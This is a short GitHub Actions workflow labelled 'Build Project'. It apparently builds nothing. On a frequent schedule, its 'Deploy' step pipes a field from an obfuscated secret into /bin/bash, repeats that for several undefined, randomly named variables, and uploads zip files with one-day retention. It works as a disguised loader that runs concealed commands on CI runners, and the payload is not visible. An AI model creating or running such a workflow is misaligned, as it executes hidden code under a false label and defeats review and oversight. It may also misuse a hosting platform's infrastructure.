name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '46 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          ly5956: ${{ secrets.ly5956 }}
        run: |
          printf '%s' "$ly5956" | jq -r .xtyh578 | /bin/bash
          echo $geuzf5 | jq -r .wzwq2 | /bin/bash
          printf '%s' "$fqngg103" | jq -r .rpygp638 | /bin/bash
          echo $eue5 | jq -r .iv2298 | /bin/bash
          printf '%s' "$yazd05" | jq -r .ub490 | /bin/bash
          printf '%s' "$ivml98452" | jq -r .hcv49857 | /bin/bash
          echo $nf807 | jq -r .iexs49994 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: fZU2ghXY
          path: "*.zip"
          retention-days: 1
